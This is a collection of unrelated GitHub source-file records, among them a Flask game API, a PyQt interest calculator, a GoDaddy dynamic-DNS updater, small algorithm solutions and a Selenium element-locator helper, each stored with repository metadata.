layout = self.layout.box()\n row = layout.row(align=True)\n row.prop(pivot_painter_2, \"export_name\")\n row = layout.row(align=True)\n row.prop(pivot_painter_2, \"export_path\")\n row = layout.row(align=True)\n row.scale_y = 2\n row.operator(\"object.lr_pivot_painter_export\", text=\"Process Hierarchy\", icon = 'EXPORT')\n\n\nclasses = [pivot_painter2_settings,VIEW3D_PT_pivot_painter2, OBJECT_OT_lr_pivot_painter_export]\n\ndef register():\n for cls in classes:\n bpy.utils.register_class(cls)\n bpy.types.Scene.pivot_painter_2 = bpy.props.PointerProperty(type=pivot_painter2_settings)\n\ndef unregister():\n for cls in classes:\n bpy.utils.unregister_class(cls)\n del bpy.types.Scene.pivot_painter_2\n","repo_name":"lukasreznicek/PivotPainter2","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16671921579","text":"#!/usr/bin/env python\n\nimport pandas\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfor m in [5, 10, 15]:\n\t# MaF01 to MaF15, but MaF08, MaF06 (they cause a bug in FIR computing _probably a division by zero_)\n\tfor prob in (1, 2, 3, 4, 5, 7, 9, 10, 11, 12, 13, 14, 15): \n\t# for prob in range(1, 16): # MaF01 to 
MaF15\n\n\t\tp=\"MaF{0:0=2d}\".format(prob)\n\n\t\tdata=pandas.read_csv('experiment/MaFMethodology/'+str(m)+'/output/HHdEA2/'+p+'/moeasfir.0', header=None, delim_whitespace=True)\n\n\t\tfor i in range(1,20):\n\t\t\tdata+=pandas.read_csv('experiment/MaFMethodology/'+str(m)+'/output/HHdEA2/'+p+'/moeasfir.'+str(i), header=None, delim_whitespace=True)\n\n\t\tdata/=20\n\n\t\tplt.plot(data.cumsum())\n\t\tlabel=(\"SPEA2\",\"MOEAD\",\"NSGAII\",\"MOEADD\",\"MOMBI2\",\"NSGAIII\",\"ThetaDEA\",\"SPEA2SDE\",\"HypE\")\n\t\tplt.legend(label, ncol=3)\n\t\tplt.xlabel(\"iterations\")\n\t\tplt.ylabel(\"R2 accumulated average improvement\")\n\t\ttitle=p+\"m\"+str(m)\n\t\tplt.title(title)\n\t\t# plt.show()\n\t\tplt.savefig(\"img/moeasfir/moeasfir\"+title+\".eps\")\n\t\tplt.clf()\n\t\tprint(title)\n","repo_name":"fritsche/hhdea","sub_path":"scripts/hhdea2/moeasfir/permoea.py","file_name":"permoea.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"41000187268","text":"import json\nfrom bson import ObjectId\nfrom flask import Flask, request, Response\n\nfrom backend.tools import log\nlogger = log.setup_custom_logger('blight')\nlogger.info('Initialising server')\n\nfrom backend.landmarks import landmark_manager\nfrom backend.landmarks.landmark import Landmark\nfrom backend.landmarks import google_places\nfrom backend.user import user_info\nfrom backend.store import store_engine\n\nfrom backend.tools import admin\n\n\napp = Flask(__name__)\n\nclass JSONEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, ObjectId):\n return str(o)\n return json.JSONEncoder.default(self, o)\n\n\n@app.route(\"/api\")\ndef hello():\n return \"Hello GGJ2018!\"\n\n\n@app.route('/api/landmarks', methods=['GET'])\ndef get_landmarks():\n # if not authentication.authenticate_token(request):\n # return Response(\"Unauthorised access\", status=401)\n\n return Response(JSONEncoder().encode(landmark_manager.get_landmarks()), status=200, mimetype='application/json')\n\n\n@app.route('/api/landmarks/add_landmarks', methods=['POST'])\ndef refresh_landmarks():\n # if not authentication.authenticate_token(request):\n # return Response(\"Unauthorised access\", status=401)\n\n content = request.json\n if not content:\n return Response(\"Send me some coords yo\", status=400)\n\n lat = content[\"lat\"]\n lng = content[\"lng\"]\n\n\n location = str(lat) + ', ' + str(lng)\n logger.debug(\"location: \" +location)\n\n google_places.find_places(location)\n\n return Response(JSONEncoder().encode(landmark_manager.get_landmarks()), status=200, mimetype='application/json')\n\n@app.route('/api/landmarks/search', methods=['GET'])\ndef search_landmarks():\n # if not authentication.authenticate_token(request):\n # return Response(\"Unauthorised access\", status=401)\n name = request.args.get(\"name\")\n if not name:\n return Response(\"Send me a name yo!\", status=400)\n\n resp = landmark_manager.get_landmarks(name)\n if resp:\n return Response(JSONEncoder().encode(resp), status=200, mimetype='application/json')\n else:\n return Response(\"Couldn't find required info, sorry\", status=400)\n\n\n@app.route('/api/landmarks/add_virion', methods=['POST'])\ndef landmarks_add_virion():\n # if not authentication.authenticate_token(request):\n # return Response(\"Unauthorised access\", status=401)\n\n content = request.json\n if not content:\n return Response('Send me some stuff', status=400)\n\n name = content[\"name\"]\n quantity = 
content[\"quantity\"]\n landmark = content[\"landmark\"]\n\n ldm = Landmark(landmark)\n ldm.add_virion(quantity)\n\n\n return Response(JSONEncoder().encode(landmark_manager.get_landmarks()), status=200, mimetype='application/json')\n\n\n#GET requests return JSON object containing user info\n#POST requests creates a new entry for the new user in the db\n@app.route('/api/user', methods=[\"GET\",\"POST\"])\ndef user():\n\n if request.method == \"POST\":\n userid = request.headers[\"userid\"]\n content = request.json\n if userid and content:\n team=content[\"team\"]\n response = user_info.create_user_info(userid, team)\n return Response(JSONEncoder().encode(response), status=200, mimetype='application/json')\n else:\n return Response(\"get me some more shiz\", status=401)\n\n if request.method == \"GET\":\n userid = request.headers[\"userid\"]\n if userid:\n info = user_info.get_user_info(userid)\n if info:\n return Response(JSONEncoder().encode(info), status=200, mimetype='application/json')\n else:\n return Response(\"User doesn't exist\", status=401)\n else:\n return Response(\"No user id provided\", status=400)\n\n\n#Updates given user's info\n@app.route('/api/user/update', methods=[\"POST\"])\ndef updateUser():\n error = ''\n try:\n userid = request.headers[\"userid\"]\n content = request.json\n print(userid)\n print(content)\n if userid and content:\n print(\"Updating user info\")\n response = user_info.update_user_info(userid, content)\n return Response(JSONEncoder().encode(response), status=200, mimetype='application/json')\n\n except Exception as e:\n return \"Error! Unable to perform /api/user/update request\"\n\n#Update given user's virion(balance)\n@app.route('/api/user/update/virion', methods=[\"POST\"])\ndef updateVirion():\n error = ''\n try:\n userid = request.headers[\"userid\"]\n content = request.json\n virion = content[\"balance\"]\n if userid and content:\n print(\"Updating user virion balance ...\")\n response = user_info.update_user_virion(userid, virion)\n return Response(JSONEncoder().encode(response), status=200, mimetype='application/json')\n\n except Exception as e:\n return \"Error! Unable to perform /api/user/update/virion request\"\n\n\n#Updates given user's info\n@app.route('/api/store', methods=[\"GET\"])\ndef getCatalogue():\n error = ''\n try:\n response = store_engine.get_store_catalogue()\n return Response(JSONEncoder().encode(response), status=200, mimetype='application/json')\n\n except Exception as e:\n return \"Error! 
Unable to perform /api/store request\"\n\n\n# Simulates users spending resource\n@app.route('/api/simulate', methods=[\"POST\"])\ndef simulate():\n\n loops = int(request.args.get(\"loops\"))\n landmark_manager.simulate(loops)\n\n return Response(status=200)\n\n\n@app.route('/api/admin/delete_users', methods=[\"POST\"])\ndef delete_users():\n\n admin.del_users()\n return Response(status=200)\n\nif __name__ == '__main__':\n app.run('0.0.0.0', 5000, use_reloader=False)\n","repo_name":"Development-Illustrated/blight-backend","sub_path":"backend/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5735,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"24261183113","text":"import numpy as np\nimport pandas as pd\n\nrowheaders = [\n ('A', 't1'),\n ('A', 't2'),\n ('A', 't2'),\n ('B', 't2'),\n ('B', 't3'),\n ('C', 't1'),\n ('Z', 't2'),\n ('Z', 't4'),\n ('D', 't2'),\n ('D', 't3'),\n]\n\npd.MultiIndex.from_tuples( rowheaders )\n\ndf = pd.DataFrame( np.random.rand(len(rowheaders), 3), columns=['a', 'b', 'c'], index=pd.MultiIndex.from_tuples( rowheaders ))\n\ndf.index.set_names(['cust', 'tier'], inplace=True)\n\nidxdf = pd.DataFrame( df.index.values.tolist(), columns=df.index.names )\n\ninc = (idxdf != idxdf.shift()).cumsum(axis=1) > 0\n\n# x = inc['cust']\n\ndef find_span( x ):\n idx = x.index[x].to_series()\n x = x * (idx.shift(-1).fillna(len(x)) - idx)\n return x.fillna(0.).astype(np.int64)\n\nparam = inc.apply(find_span)\n\nclass H(object):\n def __init__(self, rowspan=1):\n self.rowspan = rowspan\n def __repr__(self):\n return '<H>: rowspan=%s'%self.rowspan\n\nmap( lambda r: map( lambda x: H(x) if x > 0 else None, r), param.values )\n\n\ndf.join( df['a'].sum(level='cust',).rename('abc'), ).sort_values(['abc', 'a'])\n","repo_name":"gasquit/jinpingmei","sub_path":"convert_df_header.py","file_name":"convert_df_header.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20807629215","text":"from itertools import islice\n\ndef main():\n f = open('23-input.txt', 'r')\n lines = f.read().split('\\n')[:-1]\n f.close()\n\n cups = []\n for char in lines[0]:\n cups.append(int(char))\n\n curr = cups[0]\n for i in range(0, 100):\n go = move(cups, curr)\n cups = go[0]\n curr = go[1]\n\n result = ''\n for cup in cups:\n result += str(cup)\n\n final = ''\n last = result.split('1')\n for thing in last[::-1]:\n final += thing\n\n print('Result:', final)\n\ndef move(cups, curr):\n dest = curr - 1\n if dest == 0: dest = 9\n\n pickup = []\n i = cups.index(curr) + 1\n for j in range(0, 3):\n if i == len(cups): i = 0\n pickup.append(cups[i])\n i += 1\n\n for element in pickup:\n cups.remove(element)\n\n while dest not in cups:\n dest -= 1\n if dest == 0: dest = 9\n\n ind = cups.index(dest)\n for element in pickup[::-1]:\n cups.insert(ind+1, element)\n\n prev_index = cups.index(curr)\n if prev_index == len(cups) - 1:\n next_curr = cups[0]\n else:\n next_curr = cups[prev_index + 1]\n\n return cups, next_curr\n\nif __name__ == '__main__':\n main()\n\n# Result: \n","repo_name":"Clue88/AoC2020","sub_path":"Day 23/23-1.py","file_name":"23-1.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3877239964","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nRapid Gui Programming with Python and Qt - The Definitive Guide to PyQt 
Programming\nChapter 4 - Exercise\nThe Interest Program\nCreated: Thur 26 Sep 2013\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom future_builtins import *\n\nimport sys\nfrom PyQt4.QtCore import (Qt, SIGNAL)\nfrom PyQt4.QtGui import (QApplication, QComboBox, QDialog, QDoubleSpinBox, QGridLayout, QLabel)\n\nclass Form(QDialog):\n\t\n\tdef __init__(self, parent = None):\n\t\tsuper(Form, self).__init__(parent)\n\n\t\t#Set principal spinbox\n\t\tprincipalLabel = QLabel(\"Principal:\")\n\t\tself.principalSpinBox = QDoubleSpinBox()\n\t\tself.principalSpinBox.setRange(1, 1000000000)\n\t\tself.principalSpinBox.setValue(1000)\n\t\tself.principalSpinBox.setPrefix(\"$ \")\n\t\t\n\t\t#Set rate spinbox\n\t\trateLabel = QLabel(\"Rate:\")\n\t\tself.rateSpinBox = QDoubleSpinBox()\n\t\tself.rateSpinBox.setRange(1, 100)\n\t\tself.rateSpinBox.setValue(5)\n\t\tself.rateSpinBox.setSuffix(\" %\")\n\n\t\t#Set years label\n\t\tyearsLabel = QLabel(\"Years:\")\n\t\tself.yearsComboBox = QComboBox()\n\t\tself.yearsComboBox.addItem(\"1 year\")\n\t\tself.yearsComboBox.addItems([\"{0} years\".format(x) for x in range(2, 26)])\n\n\t\t#Set amount label\n\t\tamountLabel = QLabel(\"Amount\")\n\t\tself.amountLabel = QLabel()\n\n\t\t#Set grid layout for principal label and spinbox\n\t\tgrid = QGridLayout()\n\t\tgrid.addWidget(principalLabel, 0, 0)\n\t\tgrid.addWidget(self.principalSpinBox, 0, 1)\n\t\t\n\t\t#Set grid layout for rate label and spinbox\n\t\tgrid.addWidget(rateLabel, 1, 0)\n\t\tgrid.addWidget(self.rateSpinBox, 1, 1)\n\n\t\t#Set grid layout for years label and combobox\n\t\tgrid.addWidget(yearsLabel, 2, 0)\n\t\tgrid.addWidget(self.yearsComboBox, 2, 1)\n\n\t\t#Set grid layout for amount label\n\t\tgrid.addWidget(amountLabel, 3, 0)\n\t\tgrid.addWidget(self.amountLabel, 3, 1)\n\n\t\t#Set final grid layout\n\t\tself.setLayout(grid)\n\n\t\t#Set signals and slots\n\t\tself.connect(self.principalSpinBox, SIGNAL(\"valueChanged(double)\"), self.updateUi)\n\t\tself.connect(self.rateSpinBox, SIGNAL(\"valueChanged(double)\"), self.updateUi)\n\t\tself.connect(self.yearsComboBox, SIGNAL(\"currentIndexChanged(int)\"), self.updateUi)\n\n\t\t#Set Window title\n\t\tself.setWindowTitle(\"Interest\")\n\n\t\t#Update UI (call the method so the amount is shown at startup)\n\t\tself.updateUi()\n\n\tdef updateUi(self):\n\t\t\"\"\"Calculates compound interest\"\"\"\n\t\tprincipal = self.principalSpinBox.value()\n\t\trate = self.rateSpinBox.value()\n\t\tyears = self.yearsComboBox.currentIndex() + 1\n\t\tamount = principal * ((1 + (rate/100.0)) ** years)\n\t\tself.amountLabel.setText(\"$ {0:.2f}\".format(amount))\n\n#Create App\napp = QApplication(sys.argv)\nform = Form()\nform.show()\napp.exec_()\n","repo_name":"vamtiger-project/python-desktop-gui-practice","sub_path":"03-interest-calculator.pyw","file_name":"03-interest-calculator.pyw","file_ext":"pyw","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"23497370888","text":"import pandas as pd\nimport numpy as np\n\nimport hyperparams as hp\nimport util.audio as audio\nimport util.text_util as text_util\nimport tensorflow as tf\n\n\nclass DataReader():\n    def __init__(self, data_path=hp.data_path):\n        self.wavs_path = data_path\n        self.labels_path = data_path + hp.transcript_path\n\n        self._df = pd.read_csv(self.labels_path, sep='|', header=None, names=['wav_path','text', 'text_norm','duration']) \n        self._normalize_text()\n        self.df = self._df[self._df['duration'] < 
hp.max_duration].copy()\n        self.df.drop(['text_norm'], axis=1, inplace=True)\n\n    def _normalize_text(self):\n        self._df['text'] = self._df['text'].apply(text_util.text_normalize)\n    \n    @property\n    def max_duration(self):\n        return self.df['duration'].max()\n\n    @property\n    def max_characters(self):\n        return len(self.df['text'].max())\n\n    @property\n    def total_audio_len(self):\n        return self.df['duration'].sum()\n\n\n    def _process_sample(self, row, load=False):\n        \n        if load:\n            pass\n        else:\n            wav = audio.load_wav(self.wavs_path + row['wav_path'])\n\n        # Compute the linear-scale spectrogram from the wav:\n        spectrogram = audio.spectrogram(wav).astype(np.float32).T\n        # n_frames = spectrogram.shape[1]\n\n        # Compute a mel-scale spectrogram from the wav:\n        mel_spectrogram = audio.melspectrogram(wav).astype(np.float32).T\n\n        dones = np.zeros(mel_spectrogram.shape[0])\n        dones[-1] = 1\n\n        char2idx, _ = text_util.get_vocab()\n        text = [char2idx[char] for char in row['text']]\n\n        frames_count = mel_spectrogram.shape[0]\n        # Padding\n        text = tf.pad(text, ((0, hp.max_timesteps),))[:hp.max_timesteps] # (max_timesteps,)\n        mel_spectrogram = tf.pad(mel_spectrogram, ((0, hp.max_frames), (0, 0)))[:hp.max_frames] # (max_frames, n_mels)\n        dones = tf.pad(dones, ((0, hp.max_frames),))[:hp.max_frames] # (max_frames,)\n        spectrogram = tf.pad(spectrogram, ((0, hp.max_frames), (0, 0)))[:hp.max_frames] # (max_frames, 1+n_fft/2)\n\n        return text, spectrogram, mel_spectrogram, dones, frames_count\n\n    def get_data(self,n=hp.batch_size):\n        batch_x,batch_mag,batch_mel,batch_dones,batch_frames = [], [], [], [], []\n        for _, row in self.df.iterrows():\n            \n            text, mag, mel, dones,size = self._process_sample(row)\n\n            batch_x.append(text)\n            batch_mag.append(mag)\n            batch_mel.append(mel)\n            batch_dones.append(dones)\n            batch_frames.append(size)\n\n            if len(batch_x) == n:\n                \n                yield tf.convert_to_tensor(batch_x), \\\n                      tf.convert_to_tensor(batch_mag), \\\n                      tf.convert_to_tensor(batch_mel), \\\n                      tf.convert_to_tensor(batch_dones), \\\n                      tf.convert_to_tensor(batch_frames)\n\n                # reset all five batch buffers (batch_frames must be cleared too)\n                batch_x,batch_mag,batch_mel,batch_dones,batch_frames = [], [], [], [], []\n\n    def _list_to_ragged(self, values):\n        lengths = [len(v) for v in values]\n        flatten = np.concatenate(values, axis=0)\n        return tf.RaggedTensor.from_row_lengths(values=flatten,row_lengths=lengths)\n\n# next(DataReader().get_data())","repo_name":"Misterion777/tts_system","sub_path":"src/util/data_reader.py","file_name":"data_reader.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
{"seq_id":"38523821266","text":"from flanker.addresslib import address\n\nap = address.parse('Example example@example.com')\nprint(ap)\n\nnot_email = address.parse('Example @example.com')\nprint(not_email)\n\nmulti_address = address.parse_list('example1@example.com, example2@example.com')\nprint(multi_address)\n\nmulti_address2 = address.parse_list('example1@example.com, example2@example.com', as_tuple=True)\nprint(multi_address2)\n\nmulti_address3 = address.parse_list('example1@example.com, example2@example.com', strict=True)\nprint(multi_address3)\n\nfrom flanker.addresslib import validate\n\nsa = validate.suggest_alternate('example@gmail..com')\nprint(sa)\n\n\nmsg = '''MIME-Version: 1.0\nContent-Type: text/plain\nFrom: Example1 <example1@example.com>\nTo: Example2 <example2@example.com>\nSubject: hello, message\nDate: Mon, 10 Sep 2019 12:43:03 -0700\n\nthis is a single part message.'''\n\nfrom flanker import mime\n\nfs = 
mime.from_string(msg)\nprint(fs.body)\nprint(fs.headers.items())\n\nprint(fs.content_type)\nprint(fs.subject)\n\nprint(fs.content_type.is_singlepart())\nprint(fs.content_type.is_multipart())\n\n\nfrom flanker.mime import create\n\nmessage = create.text(\"plain\", \"hello, world!\")\nmessage.headers['From'] = u'Example1 <example1@example.com>'\nmessage.headers['To'] = u'Example2 <example2@example.com>'\nmessage.headers['Subject'] = u\"hello\"\nmessage = create.from_string(message.to_string())\nprint(message.to_string())","repo_name":"minwook-shin/learning-code","sub_path":"python/flanker-test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"}
{"seq_id":"3181832017","text":" #//parameters\n #int S=...; //number of servers\n #int N=...; //number of nodes\n #int F=...; //number of file VNF\n #int L=...; //number of edges/links\n \n #range servers=1..S; // virtual servers\n #range nodes=1..N; // clients\n #range files=1..F; // videos/vCDNs/services\n #range jo=1..L; // index for representing links\n #range io=1..L; // links' index\n\n#\"\"\"\n\n#Params initialization\n#POPs are the Servers\nS = 0\nobj_S = []\nDbId_S = []\ndebit_max = []\nvolume = []\nfor pop in listPOPs:\n\tobj_S.append(pop)\n\tDbId_S.append(pop.id)\n\tdebit_max.append(pop.totalNetBW)\n\tvolume.append(pop.totalDisk)\n\tS = S+1\n\nF = 0\nobj_F = []\nDbId_F = []\nsize_of = []\nfor v in listVCDNs:\n\tobj_F.append(v)\n\tDbId_F.append(v.id)\n\tsize_of.append(v.vDisk)\n\tF = F+1\n\nN = 0\nobj_N = []\nDbId_N = []\nfor c in listClientGroups:\n\tobj_N.append(c)\n\tDbId_N.append(c.id)\n\tN = N+1\n\nL = 0\nobj_L = []\nDbId_L = []\nC = []\nfor l in listNetworkLinks:\n\tobj_L.append(l)\n\tDbId_L.append(l.id)\n\tC.append(l.capacity)\n\tL = L+1\n\n\n\"\"\"\n\tint d[nodes][files]; // bitrate of file \"files\" in node \"nodes\"\n\tint C[io]; // link capacity of any edge \n\tint debit_max[servers];\n\tint z[nodes][files][io]; ///network flow parameters\n\tint volume[servers];\t//maximum storage size of each server\n\tint size_of[files];\t// vCDN parameters (size)\n\tfloat c[servers][servers][files];\t\t//cost\n \n\"\"\"\nd = [ [0 for x in range(F) ] for y in range(N)]\nfor dem in listDemands:\n\td [ DbId_N.index(dem.ClientGroupId) ][ DbId_F.index(dem.vCDNId) ] = dem.qowBW\n\nc = [ [ [0 for x in range(F) ] for y in range(S)] for z in range(S)]\nfor cost in CostPopXPopXvCDN:\n\tc [ DbId_L.index(cost.locationAId) ][ DbId_L.index(cost.locationBId) ] = cost.cost\n\nz = [ [ [0 for x in range(L) ] for y in range(F)] for z in range(N)]\n","repo_name":"TelecomSudparis-RST/vIOS","sub_path":"bin/vIOSLib/OMAC_Problem.py","file_name":"OMAC_Problem.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"35745422402","text":"# easy method\r\n\r\ndef rotateLeft(d, arr):\r\n    # rotate by slicing the array at index d\r\n    return (arr[d:] + arr[0:d])\r\n\r\n\r\n# n space n time\r\ndef rotateLeft(d, arr):\r\n    n = len(arr)\r\n    newarr = [None] * n\r\n\r\n    for i in range(n):\r\n        newidx = (i + n - d) % n\r\n        newarr[newidx] = arr[i]\r\n\r\n    return newarr\r\n\r\n\r\n# d space n time\r\n# function to rotate array by d elements using temp array\r\ndef rotateArray(arr, n, d):\r\n    temp = []\r\n    i = 0\r\n    while (i < d):\r\n        temp.append(arr[i])\r\n        i = i + 1\r\n    i = 0\r\n    while (d < n):\r\n        arr[i] = arr[d]\r\n        i = i + 1\r\n        d = d + 1\r\n    arr[:] = arr[: i] + temp\r\n    return 
arr\r\n\r\n# O(1) space, O(n*d) time\r\n\r\n# Function to left rotate arr[] of size n by d\r\ndef leftRotate(arr, d, n):\r\n    for i in range(d):\r\n        leftRotatebyOne(arr, n)\r\n\r\n\r\n# Function to left rotate arr[] of size n by 1\r\ndef leftRotatebyOne(arr, n):\r\n    temp = arr[0]\r\n    for i in range(n - 1):\r\n        arr[i] = arr[i + 1]\r\n    arr[n - 1] = temp\r\n\r\n# O(1) space, O(n) time ( gcd method )\r\ndef leftRotate(arr, d, n):\r\n    for i in range(gcd(d, n)):\r\n\r\n        # move i-th values of blocks\r\n        temp = arr[i]\r\n        j = i\r\n        while 1:\r\n            k = j + d\r\n            if k >= n:\r\n                k = k - n\r\n            if k == i:\r\n                break\r\n            arr[j] = arr[k]\r\n            j = k\r\n        arr[j] = temp\r\n\r\ndef gcd(a, b):\r\n    if b == 0:\r\n        return a\r\n    else:\r\n        return gcd(b, a%b)\r\n","repo_name":"jyotijauhari/DSA-questions-Python","sub_path":"HackerRank/LeftRotate.py","file_name":"LeftRotate.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"10466798384","text":"#!/usr/bin/python3\nfrom godaddypy import Client, Account\nimport os\nfrom os import path\nfrom os import getenv\nimport requests\nimport time\nimport datetime\nimport sys\n\n#Enable Logging\nnow = str(datetime.datetime.now()) + ' | '\n\n#Confirm variables are set\ntry:\n    subdomains = os.environ.get('SUBDOMAINS').split(';')\n    domain = os.environ.get('DOMAIN')\n    apiKey = os.environ.get('GODADDY_KEY')\n    secret = os.environ.get('GODADDY_SECRET')\nexcept:\n    print(now+'One or more environment variables not set, exiting program.')\n    sys.exit()\n\n#Get current public IP\ncurrentPublicIP = requests.get(\"https://api.ipify.org\").text\n\n#Check if cache file exists\nif path.exists(\"/cache.txt\"):\n    print(now + 'Cached IP file exists, comparing current public IP')\n    cacheFile = open('/cache.txt','r')\n    cachedIP = cacheFile.read()\n    if cachedIP == currentPublicIP:\n        print(now+'Update not needed.')\n    else:\n        #Use GoDaddyPy to interact with GoDaddy API\n        print(now+'Public IP has changed, updating now!')\n        my_acct = Account(api_key=apiKey, api_secret=secret)\n        client = Client(my_acct)\n        for singledomain in subdomains:\n            #Update all subdomains if current public IP not the same as cached\n            time.sleep(1)\n            client.update_record_ip(currentPublicIP, domain, singledomain, 'A')\n        print(now+'Records updated!')\n        #Write the new IP back to the cache so the next run compares against it\n        with open('/cache.txt', 'w') as updatedCacheFile:\n            updatedCacheFile.write(currentPublicIP)\n    cacheFile.close()\n\nelse:\n    #First run, create cache.txt\n    print(now+'Cached IP file does not exist, creating and storing current public IP')\n    newCacheFile = open('/cache.txt', 'w')\n    newCacheFile.write(currentPublicIP)\n    newCacheFile.close()\n\n    my_acct = Account(api_key=apiKey, api_secret=secret)\n    client = Client(my_acct)\n    for singledomain in subdomains:\n        time.sleep(1)\n        client.update_record_ip(currentPublicIP, domain, singledomain, 'A')\n","repo_name":"mjmammoth/godaddy-dyndns","sub_path":"godaddy-dyndns.py","file_name":"godaddy-dyndns.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"5965963094","text":"# https://www.acmicpc.net/problem/10825\r\n\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\ninfo = []\r\n\r\nfor _ in range(n):\r\n    name, kor, eng, math = input().split()\r\n    info.append([name, int(kor), int(eng), int(math)])\r\n\r\ninfo.sort(key=lambda x: (-x[1], x[2], -x[3], x[0]))\r\n\r\nfor i in info:\r\n    
print(i[0])","repo_name":"kylew1004/algorithm","sub_path":"Baekjoon/정렬/10825.py","file_name":"10825.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39974046082","text":"# -*- coding: utf-8 -*-\n# -*- coding: cp1252 -*-\n\"\"\"\nCreated on Jun 21, 2017\n@author: Built_In_Automation Solutionz Inc.\n\"\"\"\nimport sys, time, re\nimport inspect\nimport traceback\nfrom pathlib import Path\nfrom Framework.Utilities import CommonUtil\nfrom Framework.Utilities.CommonUtil import passed_tag_list, failed_tag_list\nfrom Framework.Built_In_Automation.Shared_Resources import (\n BuiltInFunctionSharedResources as sr,\n)\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport selenium\nfrom xml.etree.ElementTree import tostring, fromstring\nglobal WebDriver_Wait\nWebDriver_Wait = 2\nglobal generic_driver\ngeneric_driver = None\n# driver type will be set globally so we can use it anytime\nglobal driver_type\ndriver_type = None\n\n\nMODULE_NAME = inspect.getmodulename(__file__)\n\n\ndef Get_Element(step_data_set, driver, query_debug=False, return_all_elements=False, element_wait=None):\n \"\"\"\n This funciton will return \"zeuz_failed\" if something went wrong, else it will always return a single element\n if you are trying to produce a query from a step dataset, make sure you provide query_debug =True. This is\n good when you are just trying to see how your step data would be converted to a query for testing local runs\n \"\"\"\n try:\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n global generic_driver\n generic_driver = driver\n # Check the driver that is given and set the driver type\n global driver_type\n driver_type = _driver_type(query_debug)\n\n # Checking whether the given element is web element or web driver\n if isinstance(driver, selenium.webdriver.remote.webelement.WebElement):\n web_element_object = True\n else:\n web_element_object = False\n\n if element_wait is not None:\n element_wait = float(element_wait)\n\n if driver_type == None:\n CommonUtil.ExecLog(\n sModuleInfo, \"Incorrect driver. Please validate driver\", 3\n )\n return \"zeuz_failed\"\n\n # We need to switch to default content just in case previous action switched to something else\n try:\n if driver_type == \"selenium\":\n pass #generic_driver.switch_to.default_content()\n # we need to see if there are more than one handles. 
Since we cannot know if we had switch\n # windows before, we are going to assume that we can always safely switch to default handle 0\n \"\"\"\n try:\n all_windows = generic_driver.window_handles\n generic_driver.switch_to.window(all_windows[0])\n True\n except:\n True\n \"\"\"\n elif driver_type == \"appium\":\n\n # If we find a '|' character in the left column, then try to check the platform\n # and filter the appropriate data for the left column by removing '|'\n device_platform = (\n generic_driver.capabilities[\"platformName\"].strip().lower()\n )\n cleaned_data_set = []\n str_to_strip = \"|*|\"\n for left, middle, right in step_data_set:\n if \"element parameter\" in middle:\n # Split the attribute field if str_to_strip is present\n if left.find(str_to_strip) != -1:\n if device_platform == \"android\":\n left = left.split(str_to_strip)[0].strip()\n elif device_platform == \"ios\":\n left = left.split(str_to_strip)[1].strip()\n\n # Split the value field if str_to_strip is present\n if right.find(str_to_strip) != -1:\n if device_platform == \"android\":\n right = right.split(str_to_strip)[0].strip()\n elif device_platform == \"ios\":\n right = right.split(str_to_strip)[1].strip()\n\n new_row = (\n left,\n middle,\n right,\n )\n cleaned_data_set.append(new_row)\n\n step_data_set = cleaned_data_set\n\n new_step_data = []\n for row in step_data_set:\n if row[0] == \"resource-id\" and str(row[2]).startswith(\"*\"):\n new_value = row[2]\n new_value = (\n sr.Get_Shared_Variables(\"package_name\")\n + \":id/\"\n + new_value[1:]\n )\n new_row = [row[0], row[1], new_value]\n new_step_data.append(new_row)\n else:\n new_step_data.append(row)\n step_data_set = new_step_data\n except Exception as e:\n pass # Exceptions happen when we have an alert, but is not a problem\n\n save_parameter = \"\"\n get_parameter = \"\"\n Filter = \"\"\n text_filter_cond = False\n for row in step_data_set:\n if row[1] == \"save parameter\":\n if row[2] != \"ignore\":\n save_parameter = row[0]\n elif row[1].strip().lower() == \"get parameter\":\n if row[2].strip().startswith(\"%|\") and row[2].strip().endswith(\"|%\"):\n get_parameter = row[2].strip().strip(\"%\").strip(\"|\")\n else:\n CommonUtil.ExecLog(sModuleInfo, \"Use '%| |%' sign at right column to get variable value\", 3)\n return \"zeuz_failed\"\n elif row[1].strip().lower() == \"optional parameter\":\n left = row[0].strip().lower()\n right = row[2].strip().lower()\n if left in (\"allow hidden\", \"allow disable\"):\n Filter = left if right in (\"yes\", \"true\", \"ok\") else Filter\n elif left == \"wait\":\n element_wait = float(right)\n elif left == \"text filter\":\n text_filter_cond = right in 